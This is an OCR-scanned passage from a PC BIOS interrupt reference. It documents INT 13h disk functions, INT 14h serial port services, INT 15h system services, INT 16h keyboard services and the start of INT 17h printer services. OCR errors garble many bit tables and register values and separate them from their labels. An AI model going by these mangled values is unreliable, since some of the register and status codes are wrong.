= drive number (0=A:, 1=2nd floppy, 80h=drive 0, 81h=drive 1) 
return: 

= status (see -INT 13,STATUS-) 

= 0 if successful 


1 if error 


many good programming references indicate this function is only 
available on the AT, PS/2 and later systems, but all hard disk 
systems since the XT have this function available 


11 

11 - Recalibrate Drive (XT & newer) 

= 11h 

= drive number (O=A:, 1=2nd floppy, 80h=drive 0, 81h=drive 1) 
return: 

= status (see -INT 13,STATUS-) 

= 0 if successful 


1 if error 


many good programming references indicate this function is only 
available on the AT, PS/2 and later systems, but all hard disk 
systems since the XT have this function available 

12 

12 - Controller RAM Diagnostic (XT & portable only) 


= 12h 


return: 
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AH = status (see -INT 13,STATUS-) 
CF = 0 if successful 
= 1 if error 
:int 13,13 


AINT 13,13 - Drive Diagnostic (XT & portable only) 


AH = 18h 
on return: 
AH status (see -INT 13,STATUS-) 


O if successful 
= 1 if error 
:int 13,14 
AINT 13,14 - Controller Internal Diagnostic (XT & newer) 


AH = 14h 
on return: 
AH status (see -INT 13,STATUS-) 


O if successful 
1 if error 


(©) 
n 
HH 1 


- many good programming references indicate this function is only 
available on the AT, PS/2 and later systems, but all hard disk 
systems since the XT have this function available 

- not valid on PS/2 model 30 

:int 13,15 
NINT 13,15 - Read DASD Type (XT BIOS from 1/10/86 & newer) 


AH = 15h 

DL = drive number (0=A:, 1=2nd floppy, 80h=drive 0, 81h=drive 1) 
on return: 

AH 00 drive not present 


01 diskette, no change detection present 

02 diskette, change detection present 

03 fixed disk present 

CX:DX = number of fixed disk sectors; if 3 is returned in AH 
CF 0 if successful 

1 if error 


- XT's must have a BIOS date 1/10/86 or newer 
- used to determine if -INT 13,16- can detect disk change 


- see -INT 13, STATUS- 
:int 13,16 
AINT 13,16 - Change of Disk Status (XT BIOS from 1/10/86 & newer) 


AH = 16h 
DL = drive number (0=A:, 1=2nd floppy, 80h=drive 0, 81h=drive 1) 
on return: 


AH = 00 no disk change 
= 01 disk changed 
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CF = set if disk has been removed or an error occurred 


:int 13, 
NINT 13, 


AH 
AL 


DL 


re 


‘int 13, 
NINT 13, 


CF 


‘int 13, 
NINT 13, 


used to detect if a disk change has occurred 
see -—INT 13, STATUS- -INT 13, 15- 


17 
17 - Set DASD Type for Format (XT BIOS from 1/10/86 & newer) 


17h 

00 no disk 

01 320k/360k diskette in 320k/360k drive 

02 320k/360k diskette in 1.2Mb drive 

03 1.2Mb diskette in 1.2Mb drive 

04 720k diskette in 720k drive (BIOS 6/10/85 & newer) 
720K diskette in 1.44Mb drive (PS/2) 
1.44Mb diskette in 1.44Mb drive (PS/2) 

drive number (0=A:, 1=2nd floppy, 80h=drive 0, 81h=drive 1) 


turns nothing 


only the disk number is checked for validity 
tells BIOS format routine about the disk type 


18 
18 - Set Media Type for Format (BIOS date specific) 


= 18h 

= lower 8 bits of number of tracks (0-1023 dec., see below) 
= sectors per track (1-17 dec., see below) 

= drive number (0=A:, 1=2nd floppy, 80h=drive 0, 81h=drive 1) 
return: 

:DI = pointer to 11-byte -Disk Base Table- (DBT) 


00h if requested combination supported 

Q1h if function not available 

OCh if not supported or drive type unknown 
80h if there is no media in the drive 

0 if successful 

1 if error 


valid only for XT BIOS dated after 1/10/86, AT after 11/15/86, 
XT 286 and the PS/2 line 

only disk number is checked for validity 

track number is a 10 bit value taken from the 2 high order 
bits of CL and the 8 bits in CH (low order 8 bits of track): 


3F3E3D3C3B3A393837363534333231303 CX 

3 3 3 3 3 3 3 3 3 3 AAAAAAAAAAAAAAA sectors per track count 

3 3 3 3 3 s 3 3 AAAAAAAAAAAAAKA high order 2 bits track/cyl count 
A i I OMAR low order A. bile 0 eci ‘couni 


see -INT 13, STATUS- 


19 
19 - Park Fixed Disk Heads (AT & newer) 
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AH = 19h 

DL = drive number (0=A:, 1=2nd floppy, 80h=drive 0, 81h=drive 1) 
on return: 

AH = status (see -INT 13,STATUS-) 

CF = 0 if successful 


1 if error 


- available only on AT, XT 283 and PS/2 machines 
‘int 13,1a 
NAINT 13, 1A - Format Unit (PS/2 model 50+) 


AH = 14h 
AL = defect table count 
DL = drive number (0=A:, 1=2nd floppy, 80h=drive 0, 81h=drive 1) 


ES:BX = far pointer to defect table 
CL = modifier bits 

284333231303 Format Unit Modifier Bits 

3 3 3 3 AAAAA 1=ignore primary defect map, O=use map 
3 3 3 AAAAAA 1=ignore secondary defect map, O=use map 
3 3 AAAAAAA 1=update secondary defect map, @O=don't 

3 AAAAAAAA 1=do extended surface analysis, O=don't 


returns nothing 


- only the disk number is checked for validity 

- see -INT 13, STATUS- 
:int 14:BIOS serial services:BIOS communications:int 14,status 
AINT 14 - BIOS Asynchronous Communications Services 


% For more information, see the following topics: 


-INT 14,0- Initialize serial port parameters 

-INT 14,1- Send character in AL 

-INT 14,2- Receive character in AL 

-INT 14,3- Get Serial port status 

-INT 14,4- Extended initialize (PS/2) 

-INT 14,5- Extended communication port control (PS/2) 


- all functions have: 
= function number 
AL = character to send or receive 
= zero based RS232 card number 
- all registers are preserved except AX 
- these functions use hardware flow control 
- used by DOS MODE to redirect LPTx output to a serial device 
- see individual functions for more data 


ABIOS Asynchronous Communications Services (Status) 


37363 


534333231303 AL modem status 

3 3 3 3 s AAAAA clear to send status changed 
3 3 3 3 AAAAAA data set ready status changed 
3 3 3 AAAAAAA trailing edge ring indicator 

3 


7 
3 
3 
3 
3 3 AAAAAAAA receive line signal changed 


6 
3 
3 
3 
3 


Pagina 883 di 991 


3 3 3 AAAAAAAAA clear to send 

3 3 AAAAAAAAAA data set ready 

3 AAAAAAAAAAA ring indicator 
AAAAAAAAAAAA receive line signal detected 


37363 


534333231308 AH port status 

3 s 3 s 3 AAAAA data ready 

8 3.3 3 AAAAAA overrun error 

3 s 3 AAAAAAA parity error 

3 3 AAAAAAAA framing error 

3 AAAAAAAAA break detect 

AAAAAAKAKA transmit holding register empty 
AAAAAAAAAKA transmit shift register empty 
AAAAAAAKAKAKA time out (N/A for functions 1 and 2) 


6 
3 
3 
3 
3 
3 
3 


WWW W W W Wai 


:int 14,0 
MINT 14,0 - Initialize Communications Port Parameters 
AH = 00 
AL = parms for initialization (see tables below) 
DX = zero based serial port number (0-1) (0-3 for AT) 
37363534333231303 AL Parity (bits 4 & 3) 
3 3 3 3 3 s AAAAAAA word length bits 00 = none 
3 s 3 s 3 AAAAAAAA stop bits flag 01 = odd 
3 s 3 AAAAAAAAAAA parity bits 10 = none 
AAAAAAAAAAAAAAAA baud rate bits 11 = even 
% Word length (bits 1& 0) Stop bit count (bit 2) 
10 = 7 bits O = 1 stop bit 
11 = 8 bits 1 = 2 stop bits 
% Baud rate (bits 7, 6 & 5) 
000 = 110 baud 100 = 1200 baud 
001 = 150 baud 101 = 2400 baud 
010 = 300 baud 110 = 4800 baud 
011 = 600 baud 111 = 9600 baud (4800 on PCjr) 
on return: 
AH = port status 
AL = modem status 


- for status bits see -INT 14, STATUS- 


:int 14,1 
AINT 14,1 - Send Character to Communications Port 


AH = 01 

AL = character to send 

DX = zero based serial port number (0-1) (0-3 for AT) 
on return: 


AH = port status (see -INT 14,STATUS-) 
bit 7=0 indicates success 
bit 7=1 indicates error, bits 0-6 indicate cause 
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- -INT 14,3- should be used to determine the actual cause 
of the error since the time-out bit of the status register 
is always set during an error on this call 
- uses hardware flow control 
‘int 14,2 
NINT 14,2 - Receive Character from Communications Port 


AH = 02 
DX = zero based serial port number (0-1) (0-3 for AT) 
on return: 


AH = port status (see -INT 14,STATUS-) 
bit 7 = 0 if successful 
bit 7 = 1 if call failed 
AL = character received if call was success 


- <—INT 14,3- should be used to determine the actual cause of 
the error since the time-out bit of the status register is 
always set during an error on this call 

- uses hardware flow control 

:int 14,3 

NINT 14,3 - Get Serial Port Status 


AH = 03 

DX = zero based serial port number (0-1) (0-3 for AT) 
on return: 

AH = port status 

AL = modem status 


- for status bits see -INT 14, STATUS- 
- the status check performs a poll of the port and does not 
perform character 1/0 
:int 14,4 
AINT 14,4 - Serial Port Extended Initialization (PS/2 & later systems) 


AH = 04 
AL = break setting 
BH = parity setting 
BL = stop bit setting 
CH = word length setting 
CL = baud rate setting 
DX = zero based serial port number (0-3) 
% --- Break Setting --- 
1 = break 
O = no break 
%  ----- Parity Setting ----- --- Stop Bit Setting --- 
O = no parity O = one stop bit 
1 = odd parity 1 = 2 stop bits 
2 = even parity 1« if register CH=0 
3 = stick parity odd (5 bit word length) 
4 = stick parity even 
% -- Word Length Setting -- ---- Baud rate Setting ---- 


O = 5 bits O = 110 5 = 2400 
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WNHk 
H HU 


on return: 
AH = port status 
modem status 


AL = 


6 bits 1 = 150 6 = 4800 

7 bits 2 = 300 7 = 9600 

8 bits 3 = 600 8 = 19200 
4 = 1200 


- for status bits see -INT 14, STATUS- 


:int 14,5 


AINT 14,5 - Extended Communication Port Control (PS/2 & later systems) 


AH 
AL 


DX 


BL 


05 


read or write modem control register 

00 read modem control register 

01 read modem control register 

zero based serial port number (0-1) (0-3 for AT) 


modem control register 


736 
33 
33 
33 
33 
33 


5 
3 
3 
3 
3 
3 


37363534333231303 BL 


3 3 3 3 AAAAA 1 = activate data terminal ready 
3 3 3 AAAAAA 1 = activate request to send 


3 AAAAAAAA OUT2 


AAAAAAAAA © = normal, 1 = loopback test 


AAAAAAAAAAAAAA reserved, forced to zero 


on return: 
port status 
modem status 
-UART- modem control register 


> 
mr 
HH 


- for status bits see -INT 14, STATUS- 


‘int 15:BIOS system services:system interrupts 
AINT 15 - System BIOS Services 


AFor more information see the following topics: 


-INT 15,0- 
-INT 15,1- 
-INT 15,2- 
“INT 15,3- 
-INT 15,F- 


-INT 
-INT 
-INT 
-INT 
-INT 
-INT 
-INT 
-INT 
-INT 
-INT 
-INT 
-INT 
-INT 
-INT 
-INT 
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15, 20- 
15, 21- 
15, 40- 
15, 41- 
15, 42- 
15, 43- 
15, 44- 
15, 4F- 
15, 80- 
15, 81- 
15, 82- 
15, 83- 
15, 84- 
15, 85- 
15, 86- 


Turn cassette motor on (PC,PCjr only) 

Turn cassette motor off (PC,PCjr only) 

Read blocks from cassette (PC,PCjr only) 

Write blocks to cassette (PC,PCjr only) 

PS/2 format periodic interrupt (PS/2 only) 
PRINT.COM Critical region flag (undocumented DOS 3.x+) 
PS/2 power on self test (PS/2 except 30) 

Read / modify profiles (convertible only) 

Wait on external event (convertible only) 
Request system power off (convertible only) 
Read system status (convertible only) 
(De)activate internal modem power (convertible) 
Keyboard intercept (BIOS date specific) 

Device open 

Device close 

Program termination 

Event wait 

Joy-Stick support 

System request key pressed 

Elapsed time wait (AT and after) 


-I 
-I 
-I 
iI 
IL 
I 
-I 
=I 
-I 
-I 


:int 15, 
NINT 15, 


‘int 15, 
NINT 15, 


:int 15, 
NINT 15, 


AH 
CX 


ES: 


on 


AH 


DX 


ES: 


NT 15,87- Move block to/from extended memory 

NT 15,88- Extended memory size determination 

NT 15,89- Switch processor to protected mode 

NT 15,90- Device busy 

NT 15,91- Interrupt complete 

NT 15,CO- Return system configuration parameters (PS/2 only) 
NT 15,C1- Return extended BIOS data address (PS/2 only) 

NT 15,C2- Pointing device BIOS interface (PS/2 only) 

NT 15,C3- Enable/Disable watchdog timer 

NT 15,C4- Programmable option select 


CF is set and AX is left unchanged if a function requested in AH 
isn't supported 
some Tandy BIOS's fail to restore interrupts on return from INT 15 


(0) 
© - Turn Cassette Motor On (PC,PCjr only) 


all programs using the cassette must actually turn on 

the device before use 

there is a noticeable delay between turn-on and device ready 
a noticeable clicking noise can be heard by switching the 
cassette on and off 


see -INT 15,1- 


1 
1 - Turn Cassette Motor Off (PC,PCjr only) 


all programs using the cassette should turn off 

the device after use 

a noticeable clicking noise can be heard by switching the 
cassette on and off 


see -INT 15,0- 


2 
2 - Read Blocks from Cassette (PC,PCjr only) 


02 
count of bytes to read 


BX = pointer to data buffer 

return: 

= error code if CF=1 

= 1 if CRC error 

= 2 data transition lost, (bit signal scrambled) 
= 3 no data found on tape 

= count of bytes actually read 

BX = pointer to byte following last byte read 
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- data is transferred in 256 byte blocks, though only the 
number of bytes requested are actually stored 


:int 15,3 
AINT 15,3 - Write Blocks to Cassette (PC,PCjr only) 


AH = 03 
CX = count of bytes to write 
ES:BX = pointer to data buffer 


on return: 


CX = zero 
ES:BX = pointer to byte following last byte written 


- data is actually written in 256 byte blocks 
- if CX is less than 256, then the block is padded 
- no error detection/correction is available for writing 


‘int 15,f 
NINT 15,F - Format Periodic Interrupt (PS/2 only) 
AH = 0F 
AL = phase code 
= 00 reserved 
= 01 surface analysis 
= 02 formatting 
on return: 
CF 0 continue formatting/scanning 


1 end of format/scanning 


- after formatting/scanning each cylinder the formatting 
routine calls this interrupt 

- may be used by a program to gain control after formatting 
a cylinder 

- if invoked from a non-PS/2 CF=1 and AH contains the following 
AH = 80h for PC and PCjr 

86h on most other machines 


:int 15,20 
AINT 15,20 - PRINT.COM Critical Region Flag (undocumented DOS 3.x+) 


AH = 20h 
AL = 00 disable user critical region flag 
= ©1 enable user critical region flag 
ES:BX = pointer to user critical region flag byte (AH = 1) 


returns nothing 


- provides PRINT.COM with the address of a byte to increment on 
entry to DOS functions 
- see -bibliography- reference for "Undocumented DOS" 
:int 15,21 
AINT 15,21 - Power On Self Test (POST) Error Log (PS/2 except 30) 


AH 
AL 


21h 
00 read POST error log 
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01 write error code to POST error log 


BH = Device code (if write) 
BL = Device error (if write) 
on return 
CF = 0 if successful 
= 1 if in error (AH contains code) 
% if reading POST error log: 
AH = 00h if successful 


80h (PCjr and PC) = 86h for all other machines 
BX = number of POST error codes stored 
ES:DI pointer to POST error log 


% if writing POST error log: 
AH = 00h if successful 


01 POST error log full 
= 80h (PCjr and PC) 8 


6h for all other machines 


:int 15,40 

AINT 15,40 - Read / Modify Profiles (convertible only) 
AH = 40h 
AL = 00 - return system profile in CX,BX 


01 - modify system profile 
CX,BX = profile info 


AL = 02 - return internal modem profile in BX 


AL = 03 - modify internal modem profile 
BX = profile info 


:int 15,41 
NAINT 15,41 - Wait on External Event (convertible only) 
AH = 41h 
AL = condition type: 
37363534333231303 AL 
3 3 3 3 3 AAAAAAAAA conditions (codes) to wait for 
3 3 3 3 AAAAAAAAAA reserved 
3 3 3 AAAAAAAAAAA 1=port address/O=user byte 
AAAAAAKAAAAAAAAAA reserved 
% Condition codes: 
O = any external event 
1 = compare and return if equal 
2 = compare and return if not equal 
3 = test and return if not zero 
4 = test and return if zero 
BH condition compare or mask value 


BL = time-out value times 55 ms, O if no time limit 
= 1/0 port address (if AL bit 4 = 1) 
ES:DI = pointer to user byte (if AL bit 4 = 0) 


:int 15,42 
AINT 15,42 - Request System Power Off (convertible only) 
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AH = 42h 
AL = 00 to use system profile 
= 01 to force suspend regardless of profile 
:int 15,43 


NAINT 15,43 - Read System Status (convertible only) 


AH = 43h 
on return 
AL = STATUS: 
37363534333231303 AL 
3 3 3 3 3 s 3 AAAAA LCD detached 
3 3 3 3 3 3 AAAAAA reserved 
3 3 3 3 3 AAAAAAA RS232/parallel powered on 
3 3 3 3 AAAAAAAA internal modem powered on 
3 3 3 AAAAAAAAA power activated by alarm 
3 3 AAAAAAAAAA standby power lost 
3A 


AAAAAAAAAAA external power in use 
AAAAAAAAAAAA battery low 


:int 15,44 
NINT 15,44 - (De)activate Internal Modem Power (convertible) 


AH = 44h 
AL = 00 to power off 
= 01 to power on 
sint 15,4f 


NINT 15,4F - Keyboard Intercept (BIOS date specific) 


= 4F 
AL = scan code 


CF set to 1 (via STC instruction) 
on return 
AH = 80h, CF set (PC, PCjr) 
= 86h, CF set (XT BIOS 11/8/82, AT BIOS 1/10/84) 
AL = CF set, new scan code 


CF clear, original scancode 


- available with XT BIOS after 11/8/82, AT BIOS after 1/10/84 
- called by -INT 9-, makes allowance for keyboard translation 
- normally returns the scan code in AL, with CF set 
- if function returns with CF clear, INT 9 ignores keystroke 
- do not rely on this function being called for each INT 9 since 
any user INT 9 handler can exit prematurely and circumvent 
this function 
:int 15,80 
AINT 15,80 - Device Open 


AH = 80h 
BX = device id 
CX = process id 
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on return: 


CF = 0 if successful 
= 1 if error 
AH = 80h for PC & PCjr 


86h for XT (BIOS after 11/8/82) 
- available on the AT, XT 286, PS/2 and XT with BIOS after 11/8/82 
- designed for use in simple multitasking 


:int 15,81 
NAINT 15,81 - Device Close 


AH = 81h 
BX = device id 
CX = process id 
on return: 
CF = 0 if successful 
= 1 if error 
AH = 80h for PC & PCjr 


86h for XT (BIOS after 11/8/82) 
- available on the AT, XT 286, PS/2 and XT with BIOS after 11/8/82 
- designed for use in simple multitasking 


:int 15,82 
AINT 15,82 - Program Termination 


AH = 82h 
BX = device id 
on return: 
CF = 0 if successful 
= 1 if error 
AH = 80h for PC & PCjr 


86h for XT (BIOS after 11/8/82) 


- available on the AT, XT 286, PS/2 and XT with BIOS after 11/8/82 
- designed for use in simple multitasking 


:int 15,83 
NINT 15,83 - Event Wait 


AH = 83h 
AL = 0 set interval 
= 1 cancel interval (PS/2) 
CX,DX = number of microseconds to wait (976 as resolution) 
ES:BX = pointer to memory flag (bit 7 is set 
when interval expires) 
(granularity is 976 microseconds) 
on return: 
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CF 
AH 


1 if function already busy 
80h for PC 
86h for XT & AT 


- available on the AT (BIOS after 1/10/84) and PS/2's except 30 
- designed for use in simple multitasking 


:int 15,84 
AINT 15,84 - Joy-Stick Support 


84h 
O to read the current switch settings 
1 to read the -joystick- position (resistive inputs) 


>| 
x 
HH 1 


on return (DX=0, read switch setting): 


CF = ®© if successful 
= 1 if error 
AH = 80h error code if CF set on PC 
= 86h error code if CF set on XT before 11/8/82 
AL = switch settings in bits 7-4 (if read switch function) 
on return (DX=1, read joystick position): 
AX = A(X) 
BX = A(Y) 
CX = B(X) 
DX = B(Y) 
:int 15,85 


NINT 15,85 - System Request Key Pressed 


AH = 85h 
AL = 00 key pressed 
= 01 key released 
on return: 
CF = 0 if successful 
= 1 if error 
AH = 80h for PC or PCjr 


86h for XT (BIOS after 11/8/82) 


- called by BIOS when the System Request key is pressed/released 
- available on machines with newer BIOS and keyboards 


:int 15,86 
NAINT 15,86 - Elapsed Time Wait (AT and PS/2) 


AH = 86h 
CX,DX = number of microseconds to wait (976 as resolution) 


on return: 

set if error (PC,PCjr,XT) 
set if wait in progress 
clear if successful wait 
80h for PC and PCjr 

86h for XT 


AH 
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- AT and PS/2 only for system timing 
- not designed for user application usage 


:int 15,87 

NINT 15,87 - Move Block to/from Extended Memory 
AH = 87h 
CX = word count of block to be moved 


ES:SI = pointer to Global Descriptor Table (-GDT-) 


80h on PC and PCjr (if CF set) 
86h on XT and newer 808x machines (if CF set) 


on return: 
CF = 0 if successful (AH contains return code) 
= 1 if error detected 
AH = 0 operation successful (ZF also set) 
= 1 RAM parity error (if CF set) 
= 2 other exception (if CF set) 
= 3 gate address on line 20h failed (if CF set) 


- transfers data blocks to and from extended memory on 80286 
and 80386 machines by switching from real to protected mode 
for the duration of the transfer 

- all real mode interrupts are disabled 

- processor shuts down during the switch from protected mode 
to real mode on 286 processors 

:int 15,88 
NINT 15,88 - Extended Memory Size Determination 


AH = 88h 
on return: 
CF 80h for PC, PCjr 


86h for XT and Model 30 

other machines, set for error, clear for success 
number of contiguous 1k blocks of memory starting 
at address 1024k (100000h) 


AX 


- works only on 80286 and 80386 machines 
- retrieves bytes 30 and 31 from the -CMOS- RAM (this data is set 
by the boot memory scan 
:int 15,89 
NAINT 15,89 - Switch Processor to Protected Mode 


AH = 89h 

BH = IRQ8 interrupt vector offset 

BL = IRQO interrupt vector offset 

CX = offset into protected mode CS to jump 

ES:SI = pointer to Global Descriptor Table (-GDT-) 
on return: 

CF 0 if successful 


1 if error 


- switches 286 and 386 machines into protected mode to take 
advantage of advanced feature and extended memory 
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- Global descriptor table must be setup before interrupt 
- normal BIOS functions are not available after the switch 


- Device Busy 


code: 
disk 
diskette 
keyboard 
pointing device 
network (ES:BX = NCB) 
fixed disk reset (PS/2) 
diskette motor start 
printer 
ointer to network control block if waiting for network 


wait not satisfied 
wait time satisfied 


:int 15,90 
NINT 15,90 
AH = 90h 
AL = type 
= 00 
= 01 
= 02 
= 03 
= 80 
= FC 
= FD 
= FE 
ES:BX = p 
on return: 
CF = 0 if 
= 1if 
AH = when 


CF set, 80h for PC & PCjr, 86h for XT (BIOS 11/8/82) 


- tells the OS a a program is about to wait for a device 
- used for multitasking 0S development 


:int 15,91 
NINT 15,91 - In 
AH = 91h 
on return 
CF = 0 if 
= 1if 
AH = when 
AL = type 
= 00 
= 01 
= 02 
= 03 
= 80 
= FC 
= FD 
= FE 


terrupt Complete 


successful 
error 
CF set, 80h for PC & PCjr, 86h for XT (BIOS 11/8/82) 
code: 
disk 
diskette 
keyboard 
pointing device 
network (ES:BX = NCB) 
fixed disk reset (PS/2) 
diskette motor start 
printer 


- should not be used by applications software 
- used by the BIOS to indicate device interrupt is complete 
- used for multitasking 0S development 


sint 15,c0 
NINT 15,C0 


AH = 


- Re 


CO 


turn System Configuration Parameters (PS/2 only) 


on return: 


CF 


AH 


O if 
1if 
when 
(BIO 


successful 
error 
CF set, 80h for PC & PCjr, 86h for XT 
S after 11/8/82) and AT (BIOS after 1/10/84) 


ES:BX = pointer to system descriptor table in ROM of the format: 


% Offset Size Description 


00 
02 
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Wo 
by 


rd length of descriptor (8 minimum) 
e model byte (same as F000:FFFE, not reliable) 


03 byte secondary model byte 

04 byte BIOS revision level (zero based) 
05 byte feature information, see below 
06 dword reserved 


% Feature Information 
37363534333231303 Feature Byte 
3 3 3 s 3 s 3 AAAAA reserved 
3 3 3 3 3 3 AAAAAA 0=PC bus, 1=Micro Channel 
3 3 3 3 3 AAAAAAA Extended BIOS Data Area (-EBDA-)allocated 
3 3 3 3 AAAAAAAA wait for external event supported 
3 3 3 AAAAAAAAA -INT 15,4F- used (kbd intercept) 
3 3 AAAAAAAARA -RTC- present 
3 


AAAAAAAAAKA 2nd -8259- present 
AAAAAAAAAAAA DMA channel 3 used by fixed disk BIOS 


- see -MACHINE ID- 


:int 15,c1 
AINT 15,C1 - Return Extended BIOS Data Area Segment (PS/2 only) 


AH = C1 
on return: 
CF O if successful 


1 if error 
when CF set, 80h for PC & PCj;r, 86h for XT (BIOS 11/8/82) 
-EBDA- segment address if PS/2 


- the EBDA is used internally by the PS/2 BIOS routines 
- the EBDA is allocated at the top of user memory by the -POST- 
routine 


:int 15,C2 
AINT 15,C2 - Pointing Device BIOS Interface (PS/2 only) 


AH = C2 
AL = 0 enable/disable pointing device (BH contains flag) 
= 1 reset pointing device 
= 2 set sample rate 
= 3 set resolution 
= 4 read device type 
= 5 pointing device initialization 
= 6 extended commands 
= 7 pointing device far call initialization 
BH = © indicates enable for AL = 0 
= 1 indicates disable for AL = 0 
on return: 
CF 0 if successful 
1 if error 
AH when CF set, 80h for PC & PCj;r, 86h for XT, AT 


01 invalid function call 
02 invalid input 

03 interface error 

04  resend 

05 no far call installed 
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sint 15,C3 
NAINT 15,C3 - Enable/Disable Watchdog Timer (PS/2) 


AH = C3 
AL = 0 disable watchdog time-out 
=1 enable watchdog time-out 
BX = watchdog timer count (1-255) 
on return: 
CF = 0 if successful 
= 1 if error 
AH = when CF set, 80h for PC & PCj;r, 86h for XT, AT & Model 30 


- the watchdog timer is available only on PS/2 with 80286 and 
80386 processors. 

- the -timer- uses channel timer channel 3 and IRQ0. Activated 
when IRQ0 is active for more than one channel 0 timer cycle, 


which causes the timer to be decremented. when the watch- 
dog timer reaches 0, and NMI is generated. 
:int 15,C4 


AINT 15,C4 - Programmable Option Select (PS/2) 


AH = C4 

AL = 0 get Programmable Option Select adapter register address 
= 1 enable slot for setup 
= 2 adapter enable 

on return 

CF = 0 if successful 
= 1 if error 

AH = when CF set, 80h for PC & PCj;jr, 86h for XT, AT & 30 

BL = slot number (function AL=1) 

DL = POS adapter register address (function AL=0) 


allows access to PS/2 Programmable Option Select registers 
available on 80286 and 80386 PS/2's 


:int 16:BIOS keyboard services 
AINT 16 - Keyboard BIOS Services 


AFor more information, see the following topics: 


-INT 16,0- Wait for keystroke and read 

-INT 16,1- Get keystroke status 

-INT 16,2- Get shift status 

-INT 16,3- Set keyboard typematic rate (AT+) 

-INT 16,4- Keyboard click adjustment (AT+) 

-INT 16,5- Keyboard buffer write (AT,PS/2 enhanced keyboards) 

-INT 16,10- Wait for keystroke and read (AT,PS/2 enhanced keyboards) 
-INT 16,11- Get keystroke status (AT,PS/2 enhanced keyboards) 

-INT 16,12- Get shift status (AT,PS/2 enhanced keyboards) 


- with IBM BIOS's, INT 16 functions do not restore the flags to 
the pre-interrupt state to allow returning of information via 
the flags register 

- functions 3 through 12h are not available on all AT machines 
unless the extended keyboard BIOS is present 
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- all registers are preserved except AX and FLAGS 
- see -SCAN CODES- 

:int 16,0 

AINT 16,0 - Wait for Keypress and Read Character 


AH = 00 
on return: 
AH keyboard scan code 


ASCII character or zero if special function key 
- halts program until key with a scancode is pressed 
- see —SCAN CODES- 


:int 16,1 
NAINT 16,1 - Get Keyboard Status 


AH = 01 

on return: 

ZF = 0 if a key pressed (even Ctrl-Break) 

AX = © if no scan code is available 

AH = -scan code- 

AL = ASCII character or zero if special function key 


- data code is not removed from buffer 
- —Ctrl-Break- places a zero word in the keyboard buffer but does 
register a keypress. 
:int 16,2 
NAINT 16,2 - Read Keyboard Flags 


on return: 
AL = BIOS keyboard flags (located in -BIOS Data Area- 40:17) 


w 


/ GW WU WU W Wi 
w 


/ VW WWW WWW 
w 


3 3231303 AL or BIOS Data Area 40:17 


433 
3 3 3 3 AAAAA right shift key depressed 
3 3 3 AAAAAA left shift key depressed 
3 3 AAAAAAA CTRL key depressed 
3 AAAAAAAA ALT key depressed 

AAAAAAAAA scroll-lock is active 
AAAAAAAAAA num-lock is active 

AAAAAAAAAA caps-lock is active 


AAAAAAAAAAAA insert is active 


5 
3 
3 
3 
3 
3 


:int 16,3 

NAINT 16,3 - Set Keyboard Typematic Rate (AT+) 
AH = 03 
AL = 00 set typematic rate to default 


01 increase initial delay 

02 slow typematic rate by 1/2 
04 turn off typematic chars 
05 set typematic rate/delay 


BH = repeat delay (AL=5) 
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O = 250ms 2 = 750ms 
1 = 500ms 3 = 1000ms 
BL = typematic rate, one of the following (AL=5) 

00 - 30.0 01 - 26.7 02 - 24.0 03 - 21.8 
04 - 20.0 05 - 18.5 06 - 17.1 07 - 16.0 
08 - 15.0 09 - 13.3 OA - 12.0 OB - 10.9 
OC - 10.0 OD - 9.2 OE - 8.6 OF - 8.0 

10 - 7.5 11 - 6.7 12 - 6.0 13 - 5.5 

14 - 5.0 15 - 4.6 16 - 4.3 17 - 4.0 

18 - 3.7 19 - 3.3 1A - 3.0 1B - 2.7 

1C - 2.5 1D - 2.3 1E - 2.1 1F - 2.0 


returns nothing 


- if the typematic rate is not within range,no action is taken 
- available on AT and PS/2 machines with extended keyboard support 
- see -KEYBOARD COMMANDS- 

:int 16,4 

AINT 16,4 - Keyboard Click Adjustment (AT+) 


AH 
AL 


04 
1 for click on 
0 for click off 


- available only on AT and later machines that support the extended 
keyboard BIOS 
:int 16,5 
AINT 16,5 - Keyboard Buffer Write (AT+) 


AH = 05 

CH = -Scan code- 

CL = ASCII character 
on return: 


AL = 00 if success 
01 if buffer full 


- available on AT and PS/2 machines with extended keyboard support 
- stores normal keystroke into keyboard buffer 
- will not store attribute keys like Shift, Alt, Ctrl, etc... 


:int 16,10 
NINT 16,10 - Extended Wait for Keypress and Read Character (AT+) 


AH = 10h 
on return: 
AH = -Sscan code- 


AL = ASCII character or zero if special function key 


- available on AT and PS/2 machines with extended keyboard support 
- similar to -INT 16,0- 

:int 16,11 

AINT 16,11 - Extended Get Keyboard Status (AT+) 
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AH = 11h 


on return: 

ZF = 0 if key pressed (data waiting) 

AX = © if no scan code is available 

AH = -scan code- 

AL = ASCII character or zero if special function key 


- available on AT and PS/2 machines with extended keyboard support 
- data is not removed from buffer 
- similar to -INT 16,1- 


:int 16,12 
AINT 16,12 - Extended Get Keyboard Status (AT+) 


AH = 12h 


on return: 
AH = BIOS keyboard flags (-BIOS Data Area- location 40:18) 


w 


iii 


363 


534333231303 AH 

3 3 3 3 3 AAAAA left CTRL key depressed 
3 3 3 3 AAAAAA left ALT key depressed 

3 3 3 AAAAAAA right CTRL key pressed 

3 3 AAAAAAAA right ALT key depressed 

3 AAAAAAAAA scroll-lock depressed 
AAAAAAAAAA num-lock key depressed 
AAAAAAAAAAKA caps-lock key depressed 
AAAAAAAAAAAKA system request key depressed 


6 
3 
3 
3 
3 
3 
3 


AL = BIOS keyboard flags (BIOS Data Area location 40:17) 


w 


Coi ee (e 
w 


di io). 
w 


534333231303 AL 

3 3 3 3 3 AAAAA right shift key depressed 
3 3 3 3 AAAAAA left shift key depressed 

3 3 3 AAAAAAA CTRL key depressed 

3 3 AAAAAAAA ALT key depressed 

3 AAAAAAAAA scroll-lock is active 
AAAAAAAAAA num-lock is active 
AAAAAAAAAAA caps-lock is active 
AAAAAAAAAAAA insert is active 


- available on AT and PS/2 machines with extended keyboard support 
- similar to -INT 16,2- 
- see -KB FLAGS- 


:int 17:BIOS printer services:int 17,status:printer status 
NINT 17 - Printer BIOS Services 


% For more information, see the following topics: 
-INT 17,0- Print character 
-INT 17,1- Initialize printer port 
<INT 17,2- Read printer port status 


Status flags returned in register AH 
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63534333231303 AH (status) 

IR, Inachii 

A Fa NO ai gi ui sei 

3 3 3 AAAAAAAAA 1 = 1/0 error (-parallel- pin 15) 

3 3 AAAAAAAAKA 1 = printer selected/on-line (parallel pin 13) 
3 AAAAAAAAAAA 1 = out of paper (parallel pin 12) 
AAAAAAAAAAAA 1 = printer acknowledgment (parallel pin 10) 
AAAAAAAAAAAAA 1 = printer not busy (parallel pin 11) 


7 
3 
3 
3 
3 
3 
3 


